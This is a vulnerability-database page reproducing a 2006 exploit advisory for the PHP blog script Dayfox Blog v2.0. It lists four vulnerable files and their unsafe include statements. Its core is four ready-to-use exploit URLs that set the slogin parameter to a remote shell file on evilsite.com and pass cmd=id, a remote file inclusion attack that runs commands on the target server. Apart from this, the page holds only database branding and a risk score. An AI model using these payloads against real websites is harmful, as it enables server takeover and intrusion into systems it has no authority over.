Lucene search

DayfoxBlogv2.0.txt

🗓️ 04 Oct 2006 00:00:00Reported by Dj ReMixType

packetstorm🔗 packetstormsecurity.com👁 19 Views

BiyoSecurity.Org script Dayfox Blog v2.0 has high risk vulnerabilities in adminlog.php, postblog.php, index.php, and index2.php files, allowing remote code execution

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`# BiyoSecurity.Org  
  
# script name : Dayfox Blog v2.0  
  
# Risk : High  
  
# Regards : Dj ReMix  
  
# Thanks : Korsan , Liz0zim  
  
# Vulnerable files :   
  
adminlog.php  
postblog.php  
index.php  
index2.php  
  
# Vulnerable code :  
  
include_once ($slogin_path . "/slogin_lib.inc.php");  
include_once ($slogin_path . "/header.inc.php");  
  
  
Exploit : http://site.com/[path to script]/edit/adminlog.php?slogin=http://evilsite.com/shell.txt?&cmd=id  
  
http://site.com/[path to script]/edit/index.php?slogin=http://evilsite.com/shell.txt?&cmd=id  
  
http://site.com/[path to script]/edit/index2.php?slogin=http://evilsite.com/shell.txt?&cmd=id  
  
http://site.com/[path to script]/edit/postblog.php?slogin=http://evilsite.com/shell.txt?&cmd=id  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

04 Oct 2006 00:00Current

7.4High risk

Vulners AI Score7.4